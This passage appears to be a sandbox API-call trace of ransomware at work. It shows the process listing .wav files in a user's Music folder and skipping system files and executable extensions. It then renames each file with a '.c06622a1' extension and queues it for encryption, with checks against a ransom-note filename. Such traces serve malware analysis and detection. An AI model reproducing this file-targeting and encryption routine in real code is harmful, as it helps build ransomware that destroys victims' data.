ftLastAccessTime.dwLowDateTime=0x6f310e40, ftLastAccessTime.dwHighDateTime=0x1d5e18a, ftLastWriteTime.dwLowDateTime=0x6f310e40, ftLastWriteTime.dwHighDateTime=0x1d5e18a, nFileSizeHigh=0x0, nFileSizeLow=0x159e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ezzW_06fkU7400EGO.wav", cAlternateFileName="EZZW_0~1.WAV")) returned 1 [0160.353] _wcsicmp (_Str1="ezzW_06fkU7400EGO.wav", _Str2="README.c06622a1.TXT") returned -13 [0160.353] wcsstr (_Str="ezzW_06fkU7400EGO.wav", _SubStr="README") returned 0x0 [0160.353] _wcsicmp (_Str1="autorun.inf", _Str2="ezzW_06fkU7400EGO.wav") returned -4 [0160.353] wcslen (_String="autorun.inf") returned 0xb [0160.353] _wcsicmp (_Str1="boot.ini", _Str2="ezzW_06fkU7400EGO.wav") returned -3 [0160.353] wcslen (_String="boot.ini") returned 0x8 [0160.353] _wcsicmp (_Str1="bootfont.bin", _Str2="ezzW_06fkU7400EGO.wav") returned -3 [0160.353] wcslen (_String="bootfont.bin") returned 0xc [0160.353] _wcsicmp (_Str1="bootsect.bak", _Str2="ezzW_06fkU7400EGO.wav") returned -3 [0160.353] wcslen (_String="bootsect.bak") returned 0xc [0160.353] _wcsicmp (_Str1="desktop.ini", _Str2="ezzW_06fkU7400EGO.wav") returned -1 [0160.353] wcslen (_String="desktop.ini") returned 0xb [0160.353] _wcsicmp (_Str1="iconcache.db", _Str2="ezzW_06fkU7400EGO.wav") returned 4 [0160.353] wcslen (_String="iconcache.db") returned 0xc [0160.354] _wcsicmp (_Str1="ntldr", _Str2="ezzW_06fkU7400EGO.wav") returned 9 [0160.354] wcslen (_String="ntldr") returned 0x5 [0160.354] _wcsicmp (_Str1="ntuser.dat", _Str2="ezzW_06fkU7400EGO.wav") returned 9 [0160.354] wcslen (_String="ntuser.dat") returned 0xa [0160.354] _wcsicmp (_Str1="ntuser.dat.log", _Str2="ezzW_06fkU7400EGO.wav") returned 9 [0160.354] wcslen (_String="ntuser.dat.log") returned 0xe [0160.354] _wcsicmp (_Str1="ntuser.ini", _Str2="ezzW_06fkU7400EGO.wav") returned 9 [0160.354] wcslen (_String="ntuser.ini") returned 0xa [0160.354] _wcsicmp (_Str1="thumbs.db", _Str2="ezzW_06fkU7400EGO.wav") returned 15 [0160.354] wcslen (_String="thumbs.db") returned 0x9 [0160.354] _wcsicmp (_Str1="386", _Str2="wav") returned -68 [0160.354] wcslen (_String="386") returned 0x3 [0160.354] _wcsicmp (_Str1="adv", _Str2="wav") returned -22 [0160.354] wcslen (_String="adv") returned 0x3 [0160.354] _wcsicmp (_Str1="ani", _Str2="wav") returned -22 [0160.354] wcslen (_String="ani") returned 0x3 [0160.354] _wcsicmp (_Str1="bat", _Str2="wav") returned -21 [0160.354] wcslen (_String="bat") returned 0x3 [0160.354] _wcsicmp (_Str1="bin", _Str2="wav") returned -21 [0160.354] wcslen (_String="bin") returned 0x3 [0160.354] _wcsicmp (_Str1="cab", _Str2="wav") returned -20 [0160.354] wcslen (_String="cab") returned 0x3 [0160.354] _wcsicmp (_Str1="cmd", _Str2="wav") returned -20 [0160.355] wcslen (_String="cmd") returned 0x3 [0160.355] _wcsicmp (_Str1="com", _Str2="wav") returned -20 [0160.355] wcslen (_String="com") returned 0x3 [0160.355] _wcsicmp (_Str1="cpl", _Str2="wav") returned -20 [0160.355] wcslen (_String="cpl") returned 0x3 [0160.355] _wcsicmp (_Str1="cur", _Str2="wav") returned -20 [0160.355] wcslen (_String="cur") returned 0x3 [0160.355] _wcsicmp (_Str1="deskthemepack", _Str2="wav") returned -19 [0160.355] wcslen (_String="deskthemepack") returned 0xd [0160.355] _wcsicmp (_Str1="diagcab", _Str2="wav") returned -19 [0160.355] wcslen (_String="diagcab") returned 0x7 [0160.355] _wcsicmp (_Str1="diagcfg", _Str2="wav") returned -19 [0160.355] wcslen (_String="diagcfg") returned 0x7 [0160.355] _wcsicmp (_Str1="diagpkg", _Str2="wav") returned -19 [0160.355] wcslen (_String="diagpkg") returned 0x7 [0160.355] _wcsicmp (_Str1="dll", _Str2="wav") returned -19 [0160.355] wcslen (_String="dll") returned 0x3 [0160.355] _wcsicmp (_Str1="drv", _Str2="wav") returned -19 [0160.355] wcslen (_String="drv") returned 0x3 [0160.355] _wcsicmp (_Str1="exe", _Str2="wav") returned -18 [0160.355] wcslen (_String="exe") returned 0x3 [0160.355] _wcsicmp (_Str1="hlp", _Str2="wav") returned -15 [0160.355] wcslen (_String="hlp") returned 0x3 [0160.356] _wcsicmp (_Str1="icl", _Str2="wav") returned -14 [0160.356] wcslen (_String="icl") returned 0x3 [0160.356] _wcsicmp (_Str1="icns", _Str2="wav") returned -14 [0160.356] wcslen (_String="icns") returned 0x4 [0160.356] _wcsicmp (_Str1="ico", _Str2="wav") returned -14 [0160.356] wcslen (_String="ico") returned 0x3 [0160.356] _wcsicmp (_Str1="ics", _Str2="wav") returned -14 [0160.356] wcslen (_String="ics") returned 0x3 [0160.356] _wcsicmp (_Str1="idx", _Str2="wav") returned -14 [0160.356] wcslen (_String="idx") returned 0x3 [0160.356] _wcsicmp (_Str1="ldf", _Str2="wav") returned -11 [0160.356] wcslen (_String="ldf") returned 0x3 [0160.356] _wcsicmp (_Str1="lnk", _Str2="wav") returned -11 [0160.356] wcslen (_String="lnk") returned 0x3 [0160.356] _wcsicmp (_Str1="mod", _Str2="wav") returned -10 [0160.356] wcslen (_String="mod") returned 0x3 [0160.356] _wcsicmp (_Str1="mpa", _Str2="wav") returned -10 [0160.356] wcslen (_String="mpa") returned 0x3 [0160.356] _wcsicmp (_Str1="msc", _Str2="wav") returned -10 [0160.356] wcslen (_String="msc") returned 0x3 [0160.356] _wcsicmp (_Str1="msp", _Str2="wav") returned -10 [0160.356] wcslen (_String="msp") returned 0x3 [0160.356] _wcsicmp (_Str1="msstyles", _Str2="wav") returned -10 [0160.357] wcslen (_String="msstyles") returned 0x8 [0160.357] _wcsicmp (_Str1="msu", _Str2="wav") returned -10 [0160.357] wcslen (_String="msu") returned 0x3 [0160.357] _wcsicmp (_Str1="nls", _Str2="wav") returned -9 [0160.357] wcslen (_String="nls") returned 0x3 [0160.357] _wcsicmp (_Str1="nomedia", _Str2="wav") returned -9 [0160.357] wcslen (_String="nomedia") returned 0x7 [0160.357] _wcsicmp (_Str1="ocx", _Str2="wav") returned -8 [0160.357] wcslen (_String="ocx") returned 0x3 [0160.357] _wcsicmp (_Str1="prf", _Str2="wav") returned -7 [0160.357] wcslen (_String="prf") returned 0x3 [0160.357] _wcsicmp (_Str1="ps1", _Str2="wav") returned -7 [0160.357] wcslen (_String="ps1") returned 0x3 [0160.357] _wcsicmp (_Str1="rom", _Str2="wav") returned -5 [0160.357] wcslen (_String="rom") returned 0x3 [0160.357] _wcsicmp (_Str1="rtp", _Str2="wav") returned -5 [0160.357] wcslen (_String="rtp") returned 0x3 [0160.357] _wcsicmp (_Str1="scr", _Str2="wav") returned -4 [0160.357] wcslen (_String="scr") returned 0x3 [0160.357] _wcsicmp (_Str1="shs", _Str2="wav") returned -4 [0160.357] wcslen (_String="shs") returned 0x3 [0160.357] _wcsicmp (_Str1="spl", _Str2="wav") returned -4 [0160.358] wcslen (_String="spl") returned 0x3 [0160.358] _wcsicmp (_Str1="sys", _Str2="wav") returned -4 [0160.358] wcslen (_String="sys") returned 0x3 [0160.358] _wcsicmp (_Str1="theme", _Str2="wav") returned -3 [0160.358] wcslen (_String="theme") returned 0x5 [0160.358] _wcsicmp (_Str1="themepack", _Str2="wav") returned -3 [0160.358] wcslen (_String="themepack") returned 0x9 [0160.358] _wcsicmp (_Str1="wpx", _Str2="wav") returned 15 [0160.358] wcslen (_String="wpx") returned 0x3 [0160.358] _wcsicmp (_Str1="lock", _Str2="wav") returned -11 [0160.358] wcslen (_String="lock") returned 0x4 [0160.358] _wcsicmp (_Str1="key", _Str2="wav") returned -12 [0160.358] wcslen (_String="key") returned 0x3 [0160.358] _wcsicmp (_Str1="hta", _Str2="wav") returned -15 [0160.358] wcslen (_String="hta") returned 0x3 [0160.358] _wcsicmp (_Str1="msi", _Str2="wav") returned -10 [0160.358] wcslen (_String="msi") returned 0x3 [0160.358] _wcsicmp (_Str1="pdb", _Str2="wav") returned -7 [0160.358] wcslen (_String="pdb") returned 0x3 [0160.358] _wcsicmp (_Str1="sqlite", _Str2="wav") returned -4 [0160.358] wcslen (_String="sqlite") returned 0x6 [0160.358] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\vrm8p ah")) returned 0x10 [0160.359] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a2090 [0160.359] wcscpy (in: _Dest=0x32a2090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH" [0160.359] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH") returned 0x4c [0160.359] wcscpy (in: _Dest=0x32a212a, _Source="ezzW_06fkU7400EGO.wav" | out: _Dest="ezzW_06fkU7400EGO.wav") returned="ezzW_06fkU7400EGO.wav" [0160.359] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\ezzW_06fkU7400EGO.wav", dwFileAttributes=0x80) returned 1 [0160.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\ezzW_06fkU7400EGO.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\vrm8p ah\\ezzw_06fku7400ego.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0160.359] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.359] ReadFile (in: hFile=0x1ec, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0160.360] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0xa99d5fcb [0160.360] RtlComputeCrc32 (PartialCrc=0x5fcb, Buffer=0x32e4a4, Length=0x80) returned 0x89921609 [0160.360] RtlComputeCrc32 (PartialCrc=0x1609, Buffer=0x32e4a4, Length=0x80) returned 0x9fc0d6f4 [0160.360] RtlComputeCrc32 (PartialCrc=0xd6f4, Buffer=0x32e4a4, Length=0x80) returned 0xcc6aa657 [0160.360] RtlComputeCrc32 (PartialCrc=0xa657, Buffer=0x32e4a4, Length=0x80) returned 0x5b84a6bc [0160.360] CloseHandle (hObject=0x1ec) returned 1 [0160.360] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b2098 [0160.361] wcscpy (in: _Dest=0x32b2098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\ezzW_06fkU7400EGO.wav" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\ezzW_06fkU7400EGO.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\ezzW_06fkU7400EGO.wav" [0160.361] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\ezzW_06fkU7400EGO.wav") returned 0x62 [0160.361] wcscpy (in: _Dest=0x32b215c, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0160.361] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\ezzW_06fkU7400EGO.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\vrm8p ah\\ezzw_06fku7400ego.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\ezzW_06fkU7400EGO.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\vrm8p ah\\ezzw_06fku7400ego.wav.c06622a1"), dwFlags=0x8) returned 1 [0160.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\ezzW_06fkU7400EGO.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\vrm8p ah\\ezzw_06fku7400ego.wav.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1ec [0160.363] CreateIoCompletionPort (FileHandle=0x1ec, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0160.364] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3c60020 [0160.372] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6a86c982 [0160.372] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4113da54 [0160.372] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5a2834e5 [0160.372] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x699349 [0160.372] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6f0f0f88 [0160.372] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5ca9b502 [0160.372] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x71bcc71f [0160.372] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1fef0b18 [0160.375] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3c60094, Length=0x80) returned 0x9cf305de [0160.375] RtlComputeCrc32 (PartialCrc=0x5de, Buffer=0x3c60094, Length=0x80) returned 0xdf5c7fba [0160.375] RtlComputeCrc32 (PartialCrc=0x7fba, Buffer=0x3c60094, Length=0x80) returned 0x2394409 [0160.375] RtlComputeCrc32 (PartialCrc=0x4409, Buffer=0x3c60094, Length=0x80) returned 0xc40f9d3 [0160.375] RtlComputeCrc32 (PartialCrc=0xf9d3, Buffer=0x3c60094, Length=0x80) returned 0xb0c0f8bc [0160.375] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3c60020) returned 1 [0160.375] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a2090) returned 1 [0160.375] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b2098) returned 1 [0160.375] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d082940, ftCreationTime.dwHighDateTime=0x1d5e66a, ftLastAccessTime.dwLowDateTime=0x7d0a6d50, ftLastAccessTime.dwHighDateTime=0x1d5e80a, ftLastWriteTime.dwLowDateTime=0x7d0a6d50, ftLastWriteTime.dwHighDateTime=0x1d5e80a, nFileSizeHigh=0x0, nFileSizeLow=0x6b3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="hdD2hC_-Ra.wav", cAlternateFileName="HDD2HC~1.WAV")) returned 1 [0160.376] _wcsicmp (_Str1="hdD2hC_-Ra.wav", _Str2="README.c06622a1.TXT") returned -10 [0160.376] wcsstr (_Str="hdD2hC_-Ra.wav", _SubStr="README") returned 0x0 [0160.376] _wcsicmp (_Str1="autorun.inf", _Str2="hdD2hC_-Ra.wav") returned -7 [0160.376] wcslen (_String="autorun.inf") returned 0xb [0160.376] _wcsicmp (_Str1="boot.ini", _Str2="hdD2hC_-Ra.wav") returned -6 [0160.376] wcslen (_String="boot.ini") returned 0x8 [0160.376] _wcsicmp (_Str1="bootfont.bin", _Str2="hdD2hC_-Ra.wav") returned -6 [0160.376] wcslen (_String="bootfont.bin") returned 0xc [0160.376] _wcsicmp (_Str1="bootsect.bak", _Str2="hdD2hC_-Ra.wav") returned -6 [0160.376] wcslen (_String="bootsect.bak") returned 0xc [0160.376] _wcsicmp (_Str1="desktop.ini", _Str2="hdD2hC_-Ra.wav") returned -4 [0160.376] wcslen (_String="desktop.ini") returned 0xb [0160.376] _wcsicmp (_Str1="iconcache.db", _Str2="hdD2hC_-Ra.wav") returned 1 [0160.376] wcslen (_String="iconcache.db") returned 0xc [0160.376] _wcsicmp (_Str1="ntldr", _Str2="hdD2hC_-Ra.wav") returned 6 [0160.376] wcslen (_String="ntldr") returned 0x5 [0160.376] _wcsicmp (_Str1="ntuser.dat", _Str2="hdD2hC_-Ra.wav") returned 6 [0160.376] wcslen (_String="ntuser.dat") returned 0xa [0160.376] _wcsicmp (_Str1="ntuser.dat.log", _Str2="hdD2hC_-Ra.wav") returned 6 [0160.376] wcslen (_String="ntuser.dat.log") returned 0xe [0160.376] _wcsicmp (_Str1="ntuser.ini", _Str2="hdD2hC_-Ra.wav") returned 6 [0160.376] wcslen (_String="ntuser.ini") returned 0xa [0160.376] _wcsicmp (_Str1="thumbs.db", _Str2="hdD2hC_-Ra.wav") returned 12 [0160.376] wcslen (_String="thumbs.db") returned 0x9 [0160.376] _wcsicmp (_Str1="386", _Str2="wav") returned -68 [0160.377] wcslen (_String="386") returned 0x3 [0160.377] _wcsicmp (_Str1="adv", _Str2="wav") returned -22 [0160.377] wcslen (_String="adv") returned 0x3 [0160.377] _wcsicmp (_Str1="ani", _Str2="wav") returned -22 [0160.377] wcslen (_String="ani") returned 0x3 [0160.377] _wcsicmp (_Str1="bat", _Str2="wav") returned -21 [0160.377] wcslen (_String="bat") returned 0x3 [0160.377] _wcsicmp (_Str1="bin", _Str2="wav") returned -21 [0160.377] wcslen (_String="bin") returned 0x3 [0160.377] _wcsicmp (_Str1="cab", _Str2="wav") returned -20 [0160.377] wcslen (_String="cab") returned 0x3 [0160.377] _wcsicmp (_Str1="cmd", _Str2="wav") returned -20 [0160.377] wcslen (_String="cmd") returned 0x3 [0160.377] _wcsicmp (_Str1="com", _Str2="wav") returned -20 [0160.377] wcslen (_String="com") returned 0x3 [0160.377] _wcsicmp (_Str1="cpl", _Str2="wav") returned -20 [0160.377] wcslen (_String="cpl") returned 0x3 [0160.377] _wcsicmp (_Str1="cur", _Str2="wav") returned -20 [0160.377] wcslen (_String="cur") returned 0x3 [0160.377] _wcsicmp (_Str1="deskthemepack", _Str2="wav") returned -19 [0160.377] wcslen (_String="deskthemepack") returned 0xd [0160.377] _wcsicmp (_Str1="diagcab", _Str2="wav") returned -19 [0160.377] wcslen (_String="diagcab") returned 0x7 [0160.377] _wcsicmp (_Str1="diagcfg", _Str2="wav") returned -19 [0160.377] wcslen (_String="diagcfg") returned 0x7 [0160.377] _wcsicmp (_Str1="diagpkg", _Str2="wav") returned -19 [0160.377] wcslen (_String="diagpkg") returned 0x7 [0160.378] _wcsicmp (_Str1="dll", _Str2="wav") returned -19 [0160.378] wcslen (_String="dll") returned 0x3 [0160.378] _wcsicmp (_Str1="drv", _Str2="wav") returned -19 [0160.378] wcslen (_String="drv") returned 0x3 [0160.378] _wcsicmp (_Str1="exe", _Str2="wav") returned -18 [0160.378] wcslen (_String="exe") returned 0x3 [0160.378] _wcsicmp (_Str1="hlp", _Str2="wav") returned -15 [0160.378] wcslen (_String="hlp") returned 0x3 [0160.378] _wcsicmp (_Str1="icl", _Str2="wav") returned -14 [0160.378] wcslen (_String="icl") returned 0x3 [0160.378] _wcsicmp (_Str1="icns", _Str2="wav") returned -14 [0160.378] wcslen (_String="icns") returned 0x4 [0160.378] _wcsicmp (_Str1="ico", _Str2="wav") returned -14 [0160.378] wcslen (_String="ico") returned 0x3 [0160.378] _wcsicmp (_Str1="ics", _Str2="wav") returned -14 [0160.378] wcslen (_String="ics") returned 0x3 [0160.378] _wcsicmp (_Str1="idx", _Str2="wav") returned -14 [0160.378] wcslen (_String="idx") returned 0x3 [0160.378] _wcsicmp (_Str1="ldf", _Str2="wav") returned -11 [0160.378] wcslen (_String="ldf") returned 0x3 [0160.378] _wcsicmp (_Str1="lnk", _Str2="wav") returned -11 [0160.378] wcslen (_String="lnk") returned 0x3 [0160.378] _wcsicmp (_Str1="mod", _Str2="wav") returned -10 [0160.378] wcslen (_String="mod") returned 0x3 [0160.378] _wcsicmp (_Str1="mpa", _Str2="wav") returned -10 [0160.378] wcslen (_String="mpa") returned 0x3 [0160.378] _wcsicmp (_Str1="msc", _Str2="wav") returned -10 [0160.379] wcslen (_String="msc") returned 0x3 [0160.379] _wcsicmp (_Str1="msp", _Str2="wav") returned -10 [0160.379] wcslen (_String="msp") returned 0x3 [0160.379] _wcsicmp (_Str1="msstyles", _Str2="wav") returned -10 [0160.379] wcslen (_String="msstyles") returned 0x8 [0160.379] _wcsicmp (_Str1="msu", _Str2="wav") returned -10 [0160.379] wcslen (_String="msu") returned 0x3 [0160.379] _wcsicmp (_Str1="nls", _Str2="wav") returned -9 [0160.379] wcslen (_String="nls") returned 0x3 [0160.379] _wcsicmp (_Str1="nomedia", _Str2="wav") returned -9 [0160.379] wcslen (_String="nomedia") returned 0x7 [0160.379] _wcsicmp (_Str1="ocx", _Str2="wav") returned -8 [0160.379] wcslen (_String="ocx") returned 0x3 [0160.379] _wcsicmp (_Str1="prf", _Str2="wav") returned -7 [0160.379] wcslen (_String="prf") returned 0x3 [0160.379] _wcsicmp (_Str1="ps1", _Str2="wav") returned -7 [0160.379] wcslen (_String="ps1") returned 0x3 [0160.379] _wcsicmp (_Str1="rom", _Str2="wav") returned -5 [0160.379] wcslen (_String="rom") returned 0x3 [0160.379] _wcsicmp (_Str1="rtp", _Str2="wav") returned -5 [0160.379] wcslen (_String="rtp") returned 0x3 [0160.379] _wcsicmp (_Str1="scr", _Str2="wav") returned -4 [0160.379] wcslen (_String="scr") returned 0x3 [0160.379] _wcsicmp (_Str1="shs", _Str2="wav") returned -4 [0160.379] wcslen (_String="shs") returned 0x3 [0160.380] _wcsicmp (_Str1="spl", _Str2="wav") returned -4 [0160.380] wcslen (_String="spl") returned 0x3 [0160.380] _wcsicmp (_Str1="sys", _Str2="wav") returned -4 [0160.380] wcslen (_String="sys") returned 0x3 [0160.380] _wcsicmp (_Str1="theme", _Str2="wav") returned -3 [0160.380] wcslen (_String="theme") returned 0x5 [0160.380] _wcsicmp (_Str1="themepack", _Str2="wav") returned -3 [0160.380] wcslen (_String="themepack") returned 0x9 [0160.380] _wcsicmp (_Str1="wpx", _Str2="wav") returned 15 [0160.380] wcslen (_String="wpx") returned 0x3 [0160.380] _wcsicmp (_Str1="lock", _Str2="wav") returned -11 [0160.380] wcslen (_String="lock") returned 0x4 [0160.380] _wcsicmp (_Str1="key", _Str2="wav") returned -12 [0160.380] wcslen (_String="key") returned 0x3 [0160.380] _wcsicmp (_Str1="hta", _Str2="wav") returned -15 [0160.380] wcslen (_String="hta") returned 0x3 [0160.380] _wcsicmp (_Str1="msi", _Str2="wav") returned -10 [0160.380] wcslen (_String="msi") returned 0x3 [0160.380] _wcsicmp (_Str1="pdb", _Str2="wav") returned -7 [0160.380] wcslen (_String="pdb") returned 0x3 [0160.380] _wcsicmp (_Str1="sqlite", _Str2="wav") returned -4 [0160.380] wcslen (_String="sqlite") returned 0x6 [0160.380] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\vrm8p ah")) returned 0x10 [0160.380] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a2090 [0160.380] wcscpy (in: _Dest=0x32a2090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH" [0160.381] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH") returned 0x4c [0160.381] wcscpy (in: _Dest=0x32a212a, _Source="hdD2hC_-Ra.wav" | out: _Dest="hdD2hC_-Ra.wav") returned="hdD2hC_-Ra.wav" [0160.381] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\hdD2hC_-Ra.wav", dwFileAttributes=0x80) returned 1 [0160.382] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\hdD2hC_-Ra.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\vrm8p ah\\hdd2hc_-ra.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0160.382] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.382] ReadFile (in: hFile=0x1e8, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0160.383] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0x72cd5d47 [0160.383] RtlComputeCrc32 (PartialCrc=0x5d47, Buffer=0x32e4a4, Length=0x80) returned 0x7b13b4a8 [0160.383] RtlComputeCrc32 (PartialCrc=0xb4a8, Buffer=0x32e4a4, Length=0x80) returned 0xa2605765 [0160.383] RtlComputeCrc32 (PartialCrc=0x5765, Buffer=0x32e4a4, Length=0x80) returned 0x3203525 [0160.383] RtlComputeCrc32 (PartialCrc=0x3525, Buffer=0x32e4a4, Length=0x80) returned 0x79e8f41d [0160.383] CloseHandle (hObject=0x1e8) returned 1 [0160.383] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b2098 [0160.383] wcscpy (in: _Dest=0x32b2098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\hdD2hC_-Ra.wav" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\hdD2hC_-Ra.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\hdD2hC_-Ra.wav" [0160.383] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\hdD2hC_-Ra.wav") returned 0x5b [0160.383] wcscpy (in: _Dest=0x32b214e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0160.383] 